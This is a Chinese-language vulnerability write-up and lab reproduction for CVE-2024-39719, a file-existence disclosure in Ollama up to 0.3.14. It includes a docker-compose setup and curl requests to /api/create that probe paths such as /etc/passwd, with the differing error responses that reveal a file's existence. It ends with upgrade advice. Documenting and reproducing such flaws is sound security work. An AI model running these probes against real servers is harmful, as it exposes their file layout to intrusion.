Ollama 文件存在性泄露漏洞 CVE-2024-39719
漏洞描述
Ollama 0.3.14 及之前的版本中,攻击者可以通过 api/create 端点触发文件存在性泄露(File Existence Disclosure)漏洞。当调用 CreateModel 并传递一个不存在的路径参数时,服务器会直接返回 "File does not exist"(文件不存在)的错误消息。该漏洞允许攻击者探测服务器上特定文件是否存在,进而造成信息泄露。
参考链接:
- https://github.com/advisories/GHSA-cpxh-jwhh-m496
- https://oligosecurity.webflow.io/blog/more-models-more-probllms
- https://github.com/ollama/ollama/releases/tag/v0.1.47
- https://github.com/ollama/ollama/blob/cb42e607c5cf4d439ad4d5a93ed13c7d6a09fc34/server/images.go#L349
漏洞影响
Ollama ≤ 0.3.14环境搭建
docker-compose.yml
services:
ollama:
image: ollama/ollama:0.3.14
container_name: ollama
volumes:
- ollama:/root/.ollama
ports:
- "11434:11434"
volumes:
ollama:执行如下命令启动 Ollama 0.3.14 服务:
docker compose up -d环境启动后,访问 http://your-ip:11434/,此时 Ollma 0.3.14 已经成功运行。
漏洞复现
使用 curl 命令向本地服务器发送请求,创建一个名为 file-leak-existence 的文件。
文件不存在时,将报错 no such file or directory:
curl "http://your-ip:11434/api/create" -d '{"name": "file-leak-existence","path": "/tmp/non-existing"}'
-----
{"error":"error reading modelfile: open /tmp/non-existing: no such file or directory"}
文件存在时,将报错 command must be one of "from", "license", "template", "system", "adapter", "parameter", or "message":
curl "http://your-ip:11434/api/create" -d '{"name": "file-leak-existence","path": "/etc/passwd"}'
-----
{"error":"command must be one of \"from\", \"license\", \"template\", \"system\", \"adapter\", \"parameter\", or \"message\""}% e
传入目录而非文件路径时候,将报错 {"error":"read /xxx: is a directory"}:
curl "http://your-ip:11434/api/create" -d '{"name": "file-leak-existence","path": "/etc"}'
-----
{"error":"read /etc: is a directory"}%
漏洞修复
- 升级至最新版本 https://github.com/ollama/ollama